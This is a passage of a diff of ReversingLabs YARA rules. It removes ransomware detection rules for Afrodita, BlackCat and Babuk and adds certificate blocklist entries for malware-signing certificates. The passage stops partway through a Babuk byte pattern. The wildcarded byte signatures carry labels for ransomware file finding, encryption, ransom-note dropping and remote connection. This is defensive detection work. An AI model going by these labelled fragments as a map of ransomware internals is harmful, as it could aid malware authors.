+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Storeks LLC" and pe.signatures [ i ] . serial == "1e:5e:fa:53:a1:45:99:cc:82:f5:6f:07:90:e2:0b:17" and 1623196800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Afrodita : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Afrodita ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "513963fd-5f3d-5d31-a65a-37f6f5c72260"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "2900c6ae-9e61-5bad-a7b4-b8eca925a1ea"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Afrodita.yara#L1-L119"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ce7cc445d4c1f59c25b9505fc1f7f9dd0d286ab80510e2977b50ff15433aea60"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11460-L11476"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4d8fd52cd12f9512c0b148f9915860152f108884d29617a5fbfd62500d3a14c4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Afrodita"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$exclude_directories_and_drop_ransom_note = {
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 8D ?? ??
-            ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 75 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B
-            55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? EB ?? B8
-        }
-		$drop_ransom_note_no_dir_exclusion = {
-            8D 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 88 85 ?? ?? ?? ?? 33 C9 88 8D ?? ??
-            ?? ?? 33 D2 88 95 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 50 0F B6 8D ?? ?? ?? ?? 51 0F B6
-            95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ??
-            50 8B 4B ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B
-            5D ?? B8 ?? ?? ?? ?? C3 C7 45
-        }
-		$find_files_p1 = {
-            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
-            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
-            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
-            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
-            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
-            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
-        }
-		$find_files_p2 = {
-            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
-            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
-            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
-            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
-            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D 45
-            ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4B ?? 51
-            FF 15 ?? ?? ?? ?? 83 E0 ?? 74 ?? 8B 53 ?? 52 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 8B 43 ??
-            50 FF 15 ?? ?? ?? ?? 8B 4B ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 53
-            ?? 52 8D 45 ?? 50 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8D 55 ?? 52 8B 43 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D
-            4D ?? 51 83 EC ?? 8B D4 89 A5 ?? ?? ?? ?? 52 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 43 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
-            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( ( $exclude_directories_and_drop_ransom_note ) or ( $drop_ransom_note_no_dir_exclusion ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROTIP d.o.o. - v ste\\xC4\\x8Daju" and pe.signatures [ i ] . serial == "0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" and 1611705600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Blackcat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_F675139Ea68B897A865A98F8E4611F00 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlackCat ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e623340d-8df8-5f13-b75f-379bd0038f64"
-		date = "2022-02-14"
-		modified = "2022-02-14"
+		id = "3bac20a3-1415-53af-9d04-a30aa7488dd7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BlackCat.yara#L1-L109"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "24932baa625aedd14b5776ba3209c9ee330e84538c5267eeb5e09e352f655835"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11478-L11496"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2306e90d376f5de8a4eb6d4a696bc1781686d7094cb0a2db48019ee93c1bf60a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlackCat"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? A1 ??
-            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? A1 ?? ?? ?? ?? 0F 45 C1 8B 0D ?? ??
-            ?? ?? 0F 45 CA 8D 54 24 ?? 89 94 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 56 51 FF 50 ?? 83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ??
-            FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75
-            ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85
-        }
-		$remote_connection_p2 = {
-            C0 89 44 24 ?? 0F 88 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 74 ?? A1 ?? ?? ?? ?? 89 CB 85 C0
-            75 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 50 E8
-            ?? ?? ?? ?? 85 C0 89 D9 75 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ??
-            53 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 89 F1 8D 54 24 ?? 89 44 24 ?? 89 5C 24
-            ?? 89 5C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 84 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ??
-            ?? ?? ?? 3D ?? ?? ?? ?? 0F 43 C1 6A ?? 50 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89
-            44 24 ?? 75 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? FF 74 24 ?? 6A ?? FF 35 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 0F 84 ?? ?? ?? ?? 80 BB ?? ?? ?? ??
-            ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB
-        }
-		$enum_procs = {
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 39 F7 74 ??
-            69 C7 ?? ?? ?? ?? 89 4D ?? 01 C8 68 ?? ?? ?? ?? 89 DE 53 50 E8 ?? ?? ?? ?? 83 C4 ??
-            47 8D 85 ?? ?? ?? ?? 89 7D ?? 50 8B 5D ?? 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 89
-            F3 89 C6 EB ?? 8D 4D ?? 89 F2 E8 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? EB ?? 31 FF 8B 75 ??
-            85 FF 75 ?? E9 ?? ?? ?? ?? 31 FF 53 E8 ?? ?? ?? ?? 8B 75 ?? 85 FF 0F 84 ?? ?? ?? ??
-            83 7D ?? ?? 0F 84 ?? ?? ?? ?? 69 C7 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? 01 F0 89
-            45 ?? 8B 45 ?? 8D 04 40 8D 04 81 89 45 ?? EB
-        }
-		$find_files = {
-            57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 56 E8 ?? ?? ??
-            ?? 83 F8 ?? 89 45 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 89 C6 8B 45 ?? 8B 4D ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ??
-            8D 41 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 CB 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 45 ?? 89 43 ?? 89 73 ?? 8B 75 ?? 31 C0 C7 43 ?? ?? ?? ?? ?? F7 45
-            ?? ?? ?? ?? ?? 89 03 75 ?? 83 7D ?? ?? 74 ?? 57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? 83 7D ?? ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5E 5F 5B 5D C3
-        }
-		$encrypt_files_p1 = {
-            B8 ?? ?? ?? ?? 8D 4D ?? 8D 95 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75
-            ?? 8D 4D ?? 89 FA 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 8B 5D ?? 89
-            45 ?? 8B 45 ?? 83 F8 ?? 72 ?? 85 DB 74 ?? 0F B7 0B 81 F9 ?? ?? ?? ?? 75 ?? 8B 4B ??
-            89 C2 29 CA 72 ?? 83 FA ?? 72 ?? 85 DB 74 ?? 81 3C 0B ?? ?? ?? ?? 75 ?? 0F B7 54 0B
-            ?? 81 FA ?? ?? ?? ?? 75 ?? 0F B7 54 0B ?? 83 EA ?? 89 55 ?? BA ?? ?? ?? ?? 19 D2 89
-            55 ?? 72 ?? 83 F9 ?? 76
-        }
-		$encrypt_files_p2 = {
-            53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 57
-            6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 51 ?? 29 D0 8B 55 ?? 0F 92
-            45 ?? 83 7D ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 39 C2 77 ?? B8 ?? ?? ?? ?? F7 64 0B ?? 8B
-            55 ?? 70 ?? 39 C2 72 ?? 8B 44 0B ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? 8B 85 ??
-            ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ??
-            89 45 ?? 89 10 89 48 ?? 8B 45 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ??
-            8B 45 ?? 8B 4D ?? 29 45 ?? 3B 4D ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8B 45 ?? 8B 4D ?? 89 45 ?? 89 4D ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 8B 45 ?? F2 0F 10 45 ?? 85 F6 89 85 ?? ?? ?? ?? F2 0F 11 85 ?? ?? ?? ?? 0F 84
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8D 0C C0 8D 3C 49 01 C7 01 F7 EB
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_procs ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BS TEHNIK d.o.o." and ( pe.signatures [ i ] . serial == "00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" or pe.signatures [ i ] . serial == "f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" ) and 1606953600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Babuk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4728189Fa0F57793484Cdf764F5E283D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Babuk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8a96f400-193f-5fd1-ba03-4da464345e1c"
-		date = "2021-01-26"
-		modified = "2021-01-26"
+		id = "fd1b83aa-bfcc-590c-8f97-875badf09698"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Babuk.yara#L1-L117"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "70327b3f9d0b0505ade7ee6de6d7facf56820c7e8477bd172f738f374311144f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11498-L11514"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9ec7e84c77583bd52ccfb8d6d5831f3634ed0a401d8103376c4775b7f2c43d81"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Babuk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8B
-            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ??
-            ?? ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 73 ?? 8B 85 ?? ?? ?? ?? 8B
-            0C 85 ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 74 ?? 83 7D ?? ?? 77 ?? 8B 45 ?? 83
-            C0 ?? 50 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 7C ?? 8B 95 ?? ?? ?? ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? 8D 94 4D ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? EB ??
-            EB ?? EB ?? EB ?? EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
